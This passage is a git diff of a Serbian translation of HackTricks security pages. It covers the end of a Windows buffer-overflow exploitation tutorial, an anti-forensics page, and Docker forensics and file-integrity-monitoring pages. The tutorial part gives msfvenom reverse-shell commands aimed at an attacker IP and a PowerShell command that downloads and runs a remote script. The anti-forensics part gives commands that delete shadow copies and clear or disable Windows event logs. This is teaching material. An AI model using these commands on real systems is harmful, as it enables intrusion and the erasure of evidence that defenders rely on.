izvršite: +Sada, unutar ove memorije trebalo bi pronaći neke bajtove JMP ESP, da biste to uradili, izvršite: ``` !mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP) !mona find -s "\xff\xe4" -m slmfc.dll # Example in this case ``` -**Zatim, ako se pronađe neka adresa, odaberite onu koja ne sadrži nijedan loš karakter:** +**Zatim, ako je pronađena neka adresa, izaberite onu koja ne sadrži nijedan loš karakter:** ![](<../.gitbook/assets/image (36) (1).png>) -**U ovom slučaju, na primer: \_0x5f4a358f**\_ +**U ovom slučaju, na primer: \_0x5f4a358f**\_ -## Kreirajte shellcode +## Kreiraj shellcode ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d' msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d' ``` -Ako eksploit ne radi, iako bi trebao (možete videti sa ImDebg da je shellcode dostignut), pokušajte da kreirate druge shellcode-ove (msfvenom će kreirati različite shellcode-ove za iste parametre). +Ako eksploatacija ne radi, ali trebalo bi (možete videti pomoću ImDebg-a da je shellkod dostignut), pokušajte da kreirate druge shellkodove (msfvenom će kreirati različite shellkodove za iste parametre). -**Dodajte nekoliko NOPS-a na početak** shellcode-a i koristite ga i povratnu adresu za JMP ESP, i završite eksploit: +**Dodajte nekoliko NOPS-ova na početak** shellkoda i koristite ga i povratnu adresu za JMP ESP, zatim završite eksploataciju: ```bash #!/usr/bin/python @@ -265,25 +239,26 @@ except: print "Could not connect to "+ip+":"+port ``` {% hint style="warning" %} -Postoje shellkodovi koji će **prepisati sami sebe**, stoga je važno uvijek dodati nekoliko NOP naredbi prije shellkoda. +Postoje shellkodovi koji će **prepisati sami sebe**, stoga je važno uvek dodati neke NOP instrukcije pre shellkoda {% endhint %} -## Poboljšanje shellkoda +## Unapređenje shellkoda Dodajte ove parametre: ``` EXITFUNC=thread -e x86/shikata_ga_nai ``` +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md index 7c539a8d6..179c903bd 100644 --- a/forensics/basic-forensic-methodology/anti-forensic-techniques.md +++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %}
@@ -19,28 +20,28 @@ Drugi načini podrške HackTricks-u: # Vremenske oznake -Napadač može biti zainteresovan za **menjanje vremenskih oznaka fajlova** kako bi izbegao otkrivanje.\ -Moguće je pronaći vremenske oznake unutar MFT-a u atributima `$STANDARD_INFORMATION` __ i __ `$FILE_NAME`. +Napadač može biti zainteresovan za **menjanje vremenskih oznaka datoteka** kako bi izbegao otkrivanje.\ +Moguće je pronaći vremenske oznake unutar MFT u atributima `$STANDARD_INFORMATION` __ i __ `$FILE_NAME`. -Oba atributa imaju 4 vremenske oznake: **Modifikacija**, **pristup**, **kreacija**, i **modifikacija MFT registra** (MACE ili MACB). +Oba atributa imaju 4 vremenske oznake: **Modifikacija**, **pristup**, **kreacija** i **modifikacija registra MFT** (MACE ili MACB). **Windows explorer** i drugi alati prikazuju informacije iz **`$STANDARD_INFORMATION`**. ## TimeStomp - Anti-forenzički alat -Ovaj alat **menja** informacije o vremenskim oznakama unutar **`$STANDARD_INFORMATION`** **ali ne** informacije unutar **`$FILE_NAME`**. Stoga je moguće **identifikovati** **sumnjivu** **aktivnost**. +Ovaj alat **menja** informacije o vremenskim oznakama unutar **`$STANDARD_INFORMATION`** **ali** **ne** informacije unutar **`$FILE_NAME`**. Stoga je moguće **identifikovati** **sumnjivu** **aktivnost**. ## Usnjrnl -**USN Journal** (Update Sequence Number Journal) je funkcija NTFS-a (Windows NT fajl sistem) koja prati promene na volumenu. Alat [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) omogućava pregled ovih promena. +**USN Journal** (Update Sequence Number Journal) je funkcija NTFS (Windows NT fajl sistem) koja prati promene na volumenu. Alat [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) omogućava pregled ovih promena. ![](<../../.gitbook/assets/image (449).png>) -Prethodna slika je **izlaz** prikazan od strane **alata** gde se može primetiti da su neke **promene izvršene** na fajlu. +Prethodna slika je **izlaz** prikazan od strane **alata** gde se može primetiti da su neke **promene izvršene** na datoteci. ## $LogFile -**Sve promene metapodataka na fajl sistemu se beleže** u procesu poznatom kao [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). Beleženi metapodaci se čuvaju u fajlu nazvanom `**$LogFile**`, smeštenom u korenskom direktorijumu NTFS fajl sistema. Alati poput [LogFileParser](https://github.com/jschicht/LogFileParser) mogu se koristiti za parsiranje ovog fajla i identifikaciju promena. +**Sve promene metapodataka na fajl sistemu se beleže** u procesu poznatom kao [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). Beleženi metapodaci se čuvaju u fajlu nazvanom `**$LogFile**`, smeštenom u korenom direktorijumu NTFS fajl sistema. Alati poput [LogFileParser](https://github.com/jschicht/LogFileParser) mogu se koristiti za parsiranje ovog fajla i identifikaciju promena. ![](<../../.gitbook/assets/image (450).png>) @@ -52,16 +53,16 @@ Korišćenjem istog alata moguće je identifikovati **u koje vreme su vremenske * CTIME: Vreme kreiranja fajla * ATIME: Vreme modifikacije fajla -* MTIME: Modifikacija MFT registra fajla +* MTIME: Modifikacija registra MFT fajla * RTIME: Vreme pristupa fajlu ## Poređenje `$STANDARD_INFORMATION` i `$FILE_NAME` -Još jedan način identifikovanja sumnjivih modifikovanih fajlova bio bi upoređivanje vremena na oba atributa u potrazi za **neslaganjima**. +Još jedan način identifikovanja sumnjivih modifikovanih datoteka bio bi upoređivanje vremena na oba atributa u potrazi za **neslaganjima**. ## Nanosekunde -**NTFS** vremenske oznake imaju **preciznost** od **100 nanosekundi**. Zato je veoma sumnjivo pronaći fajlove sa vremenima oznaka kao što su 2010-10-10 10:10:**00.000:0000**. +Vremenske oznake **NTFS** imaju **preciznost** od **100 nanosekundi**. Zato je veoma sumnjivo pronaći datoteke sa vremenskim oznakama poput 2010-10-10 10:10:**00.000:0000**. ## SetMace - Anti-forenzički alat @@ -69,22 +70,22 @@ Ovaj alat može modifikovati oba atributa `$STARNDAR_INFORMATION` i `$FILE_NAME` # Skrivanje podataka -NTFS koristi klaster i minimalnu veličinu informacija. To znači da ako fajl zauzima klaster i po, **preostali deo nikada neće biti korišćen** dok fajl ne bude obrisan. Zato je moguće **sakriti podatke u ovom praznom prostoru**. +NTFS koristi klaster i minimalnu veličinu informacija. To znači da ako datoteka zauzima klaster i pola, **preostala polovina nikada neće biti korišćena** dok datoteka ne bude obrisana. Zato je moguće **sakriti podatke u ovom praznom prostoru**. Postoje alati poput slacker koji omogućavaju skrivanje podataka u ovom "skrivenom" prostoru. Međutim, analiza `$logfile` i `$usnjrnl` može pokazati da su dodati neki podaci: ![](<../../.gitbook/assets/image (452).png>) -Zatim je moguće povratiti prazan prostor korišćenjem alata poput FTK Imager. Imajte na umu da ovaj tip alata može sačuvati sadržaj zamućen ili čak šifrovan. +Zato je moguće povratiti prazan prostor korišćenjem alata poput FTK Imager. Imajte na umu da ovaj tip alata može sačuvati sadržaj zamućen ili čak šifrovan. # UsbKill Ovo je alat koji će **isključiti računar ako se detektuje bilo kakva promena u USB** portovima.\ -Način da se ovo otkrije je inspekcija pokrenutih procesa i **pregled svakog Python skripta koji se izvršava**. +Način da se ovo otkrije je inspekcija pokrenutih procesa i **pregled svakog pokrenutog python skripta**. # Linux distribucije uživo -Ove distribucije se **izvršavaju unutar RAM** memorije. Jedini način da se otkriju je **ukoliko je NTFS fajl-sistem montiran sa dozvolama za pisanje**. Ako je montiran samo sa dozvolama za čitanje, neće biti moguće otkriti upad. +Ove distribucije se **izvršavaju unutar RAM** memorije. Jedini način da ih otkrijete je **ukoliko je NTFS fajl-sistem montiran sa dozvolama za pisanje**. Ako je montiran samo sa dozvolama za čitanje, neće biti moguće otkriti upad. # Bezbedno brisanje @@ -98,55 +99,55 @@ Moguće je onemogućiti nekoliko metoda beleženja Windows-a kako bi forenzička Ovo je registarski ključ koji čuva datume i sate kada je svaki izvršni fajl pokrenut od strane korisnika. -Onemogućavanje UserAssist-a zahteva dva koraka: +Onemogućavanje UserAssist zahteva dva koraka: 1. Postavite dva registarska ključa, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` i `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, oba na nulu kako biste signalizirali da želite onemogućiti UserAssist. 2. Obrišite podstabla registra koja izgledaju kao `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`. ## Onemogući vremenske oznake - Prefetch -Ovo će sačuvati informacije o aplikacijama koje su izvršene sa ciljem poboljšanja performansi Windows sistema. Međutim, ovo može biti korisno i za forenzičke prakse. +Ovo će sačuvati informacije o aplikacijama koje su pokrenute sa ciljem poboljšanja performansi Windows sistema. Međutim, ovo može biti korisno i za forenzičke prakse. * Izvršite `regedit` * Izaberite putanju fajla `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters` * Desni klik na `EnablePrefetcher` i `EnableSuperfetch` * Izaberite Izmeni na svakom od njih da promenite vrednost sa 1 (ili 3) na 0 -* Ponovo pokrenite +* Ponovo pokrenite računar ## Onemogući vremenske oznake - Vreme poslednjeg pristupa -Kada se folder otvori sa NTFS volumena na Windows NT serveru, sistem uzima vreme da **ažurira polje vremenske oznake na svakom navedenom folderu**, nazvano vreme poslednjeg pristupa. Na veoma korišćenom NTFS volumenu, ovo može uticati na performanse. +Kada se otvori folder sa NTFS volumena na Windows NT serveru, sistem uzima vreme da **ažurira polje vremenske oznake na svakom navedenom folderu**, nazvano vreme poslednjeg pristupa. Na veoma korišćenom NTFS volumenu, ovo može uticati na performanse. 1. Otvorite Registry Editor (Regedit.exe). 2. Pretražite `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`. 3. Potražite `NtfsDisableLastAccessUpdate`. Ako ne postoji, dodajte ovaj DWORD i postavite vrednost na 1, što će onemogućiti proces. 4. Zatvorite Registry Editor i ponovo pokrenite server. -## Obriši USB istoriju +## Brisanje USB istorije -Svi **unosu uređaja USB-a** se čuvaju u Windows registru pod ključem **USBSTOR** koji sadrži podključeve koji se kreiraju svaki put kada priključite USB uređaj na računar ili laptop. Možete pronaći ovaj ključ ovde `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Brisanjem ovoga** ćete obrisati USB istoriju.\ -Takođe možete koristiti alat [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) da biste bili sigurni da ste ih obrisali (i da ih obrišete). +Svi **unosi USB uređaja** se čuvaju u Windows registru pod ključem **USBSTOR** koji sadrži podključeve koji se kreiraju svaki put kada priključite USB uređaj na računar ili laptop. Možete pronaći ovaj ključ ovde `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Brisanjem ovoga** ćete obrisati USB istoriju.\ +Takođe možete koristiti alatku [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) da biste bili sigurni da ste ih obrisali (i da ih obrišete). -Drugi fajl koji čuva informacije o USB uređajima je fajl `setupapi.dev.log` unutar `C:\Windows\INF`. I ovaj fajl treba obrisati. +Još jedan fajl koji čuva informacije o USB uređajima je fajl `setupapi.dev.log` unutar `C:\Windows\INF`. I ovaj fajl treba obrisati. -## Onemogući senke kopija +## Onemogući Shadow kopije -**Prikaži** senke kopija sa `vssadmin list shadowstorage`\ +**Prikaži** shadow kopije sa `vssadmin list shadowstorage`\ **Obriši** ih pokretanjem `vssadmin delete shadow` Takođe ih možete obrisati putem GUI prateći korake predložene na [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) -Za onemogućavanje senki kopija [koraci odavde](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): +Za onemogućavanje shadow kopija [koraci odavde](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): 1. Otvorite program Services kucanjem "services" u polje za pretragu teksta nakon što kliknete na Windows start dugme. -2. Iz liste pronađite "Volume Shadow Copy", izaberite ga, a zatim pristupite Properties desnim klikom. +2. Iz liste pronađite "Volume Shadow Copy", izaberite ga, a zatim pristupite Properties opciji desnim klikom. 3. Izaberite Disabled iz padajućeg menija "Startup type", a zatim potvrdite promenu klikom na Apply i OK. -Takođe je moguće izmeniti konfiguraciju koje datoteke će biti kopirane u senki kopiji u registru `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` +Takođe je moguće modifikovati konfiguraciju koje datoteke će biti kopirane u shadow kopiji u registru `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` ## Prepisi obrisane fajlove -* Možete koristiti **Windows alat**: `cipher /w:C` Ovo će narediti cifri da ukloni sve podatke sa dostupnog neiskorišćenog prostora na disku C. -* Takođe možete koristiti alate poput [**Eraser**](https://eraser.heidi.ie) +* Možete koristiti **Windows alatku**: `cipher /w:C` Ovo će narediti cifri da ukloni sve podatke sa dostupnog neiskorišćenog prostora na disku C. +* Takođe možete koristiti alatke poput [**Eraser**](https://eraser.heidi.ie) ## Obriši Windows događajne zapise @@ -157,7 +158,7 @@ Takođe je moguće izmeniti konfiguraciju koje datoteke će biti kopirane u senk ## Onemogući Windows događajne zapise * `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f` -* Unutar sekcije servisa onemogućite servis "Windows Event Log" +* Unutar sekcije servisa onemogući servis "Windows Event Log" * `WEvtUtil.exec clear-log` ili `WEvtUtil.exe cl` ## Onemogući $UsnJrnl diff --git a/forensics/basic-forensic-methodology/docker-forensics.md b/forensics/basic-forensic-methodology/docker-forensics.md index 1ad54a58b..eae244588 100644 --- a/forensics/basic-forensic-methodology/docker-forensics.md +++ b/forensics/basic-forensic-methodology/docker-forensics.md @@ -1,28 +1,29 @@ -# Forenzika Docker-a +# Docker forenzika + +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} ## Modifikacija kontejnera -Postoje sumnje da je neki docker kontejner kompromitovan: +Postoje sumnje da je neki Docker kontejner kompromitovan: ```bash docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress ``` -Lako možete **pronaći izmene koje su napravljene na ovom kontejneru u vezi sa slikom** pomoću: +Možete lako **pronaći modifikacije urađene na ovom kontejneru u vezi sa slikom** sa: ```bash docker diff wordpress C /var @@ -37,23 +38,23 @@ A /var/lib/mysql/mysql/general_log.CSV ... ``` U prethodnoj komandi **C** znači **Promenjeno** i **A,** **Dodato**.\ -Ako primetite da je neka zanimljiva datoteka poput `/etc/shadow` izmenjena, možete je preuzeti iz kontejnera kako biste proverili da li postoji zlonamerna aktivnost pomoću: +Ako otkrijete da je neka zanimljiva datoteka poput `/etc/shadow` izmenjena, možete je preuzeti iz kontejnera radi provere zlonamernih aktivnosti pomoću: ```bash docker cp wordpress:/etc/shadow. ``` -Možete ga takođe **uporediti sa originalnim** pokretanjem nove kontejnera i izvlačenjem datoteke iz njega: +Možete **uporediti sa originalnim** pokretanjem novog kontejnera i izvlačenjem fajla iz njega: ```bash docker run -d lamp-wordpress docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container diff original_shadow shadow ``` -Ako primetite da je **dodat sumnjiv fajl**, možete pristupiti kontejneru i proveriti ga: +Ako otkrijete da je **dodat neki sumnjiv fajl** možete pristupiti kontejneru i proveriti ga: ```bash docker exec -it wordpress bash ``` ## Modifikacije slika -Kada vam je dat izvezena Docker slika (verovatno u `.tar` formatu), možete koristiti [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) da **izvučete sažetak modifikacija**: +Kada vam je dat izvezen Docker image (verovatno u `.tar` formatu) možete koristiti [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) da **izvučete sažetak modifikacija**: ```bash docker save > image.tar #Export the image to a .tar file container-diff analyze -t sizelayer image.tar @@ -66,22 +67,22 @@ tar -xf image.tar ``` ### Osnovna analiza -Možete dobiti **osnovne informacije** o pokrenutoj slici: +Možete dobiti **osnovne informacije** iz pokrenute slike: ```bash docker inspect ``` -Takođe možete dobiti sažetak **istorije promena** sa: +Možete dobiti sažetak **istorije promena** pomoću: ```bash docker history --no-trunc ``` -Takođe možete generisati **dockerfile iz slike** pomoću: +Možete generisati **dockerfile iz slike** pomoću: ```bash alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage" dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers> ``` -### Dive +### Uronite -Da biste pronašli dodate/izmenjene datoteke u Docker slikama, možete koristiti i [**dive**](https://github.com/wagoodman/dive) (preuzmite ga sa [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) alat: +Da biste pronašli dodate/izmenjene datoteke u docker slikama, možete koristiti i [**dive**](https://github.com/wagoodman/dive) (preuzmite ga sa [**izdanja**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) alat: ```bash #First you need to load the image in your docker repo sudo docker load < image.tar 1 ⨯ @@ -90,30 +91,16 @@ Loaded image: flask:latest #And then open it with dive: sudo dive flask:latest ``` -Ovo vam omogućava da **navigirate kroz različite blobove Docker slika** i proverite koje su datoteke izmenjene/dodate. **Crvena** boja označava dodate datoteke, a **žuta** boja označava izmenjene datoteke. Koristite **tab** za prelazak na drugi prikaz i **razmaknicu** za skupljanje/otvaranje foldera. +Ovo vam omogućava da **navigirate kroz različite blobove docker slika** i proverite koje datoteke su izmenjene/dodate. **Crvena** boja znači dodato, a **žuta** znači izmenjeno. Koristite **tab** za prelazak na drugi prikaz i **razmak** za skupljanje/otvaranje foldera. -Sa die-om nećete moći da pristupite sadržaju različitih faza slike. Da biste to uradili, moraćete **dekompresovati svaki sloj i pristupiti mu**.\ +Pomoću ovoga nećete moći pristupiti sadržaju različitih faza slike. Da biste to uradili, moraćete **dekompresovati svaki sloj i pristupiti mu**.\ Možete dekompresovati sve slojeve slike iz direktorijuma gde je slika dekompresovana izvršavanjem: ```bash tar -xf image.tar for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done ``` -## Poverenijalni podaci iz memorije +## Kredencijali iz memorije -Imajte na umu da kada pokrenete Docker kontejner unutar hosta, **možete videti procese koji se izvršavaju na kontejneru sa hosta** tako što ćete pokrenuti `ps -ef`. +Imajte na umu da kada pokrenete docker kontejner unutar domaćina **možete videti procese koji se izvršavaju na kontejneru sa domaćina** jednostavno pokretanjem `ps -ef` -Stoga (kao root) možete **izvući memoriju procesa** sa hosta i pretraživati je u potrazi za **poverenijalnim podacima**, baš [**kao u sledećem primeru**](../../linux-hardening/privilege-escalation/#process-memory). - -
- -Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! - -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu**, proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. - -
+Stoga (kao root) možete **izbaciti memoriju procesa** sa domaćina i pretraživati **kredencijale** baš [**kao u sledećem primeru**](../../linux-hardening/privilege-escalation/#process-memory). diff --git a/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/forensics/basic-forensic-methodology/file-integrity-monitoring.md index b006bb13f..f39366109 100644 --- a/forensics/basic-forensic-methodology/file-integrity-monitoring.md +++ b/forensics/basic-forensic-methodology/file-integrity-monitoring.md @@ -1,31 +1,32 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks obuka AWS Red Tim Ekspert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks obuka GCP Red Tim Ekspert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} # Osnovna linija -Osnovna linija se sastoji od snimanja trenutnog stanja određenih delova sistema kako bi se **uporedilo sa budućim stanjem i istakle promene**. +Osnovna linija se sastoji od uzimanja snimka određenih delova sistema kako bi se **uporedila sa budućim stanjem i istakle promene**. -Na primer, možete izračunati i sačuvati heš svake datoteke na fajl sistemu kako biste saznali koje su datoteke izmenjene.\ -Ovo se takođe može uraditi sa kreiranim korisničkim nalozima, pokrenutim procesima, pokrenutim servisima i bilo čim drugim što se ne bi trebalo mnogo ili uopšte ne bi trebalo menjati. +Na primer, možete izračunati i sačuvati heš svake datoteke na fajl sistemu kako biste mogli da saznate koje datoteke su izmenjene.\ +Ovo se takođe može uraditi sa kreiranim korisničkim nalozima, pokrenutim procesima, pokrenutim servisima i bilo čime drugim što se ne bi trebalo mnogo menjati, ili uopšte. -## Praćenje integriteta datoteka +## Praćenje Integriteta Datoteka -Praćenje integriteta datoteka (FIM) je kritična bezbednosna tehnika koja štiti IT okruženja i podatke praćenjem promena u datotekama. Uključuje dva ključna koraka: +Praćenje Integriteta Datoteka (FIM) je kritična bezbednosna tehnika koja štiti IT okruženja i podatke praćenjem promena u datotekama. Uključuje dva ključna koraka: -1. **Upoređivanje sa osnovnom linijom:** Uspostavite osnovnu liniju koristeći atribute datoteka ili kriptografske kontrolne sume (poput MD5 ili SHA-2) za buduća upoređivanja radi otkrivanja izmena. -2. **Obaveštenje o promeni u realnom vremenu:** Dobijajte trenutna upozorenja kada se datoteke pristupaju ili menjaju, obično putem proširenja jezgra operativnog sistema. +1. **Upoređivanje Osnovne Linije:** Uspostavljanje osnovne linije korišćenjem atributa datoteka ili kriptografskih provera (poput MD5 ili SHA-2) za 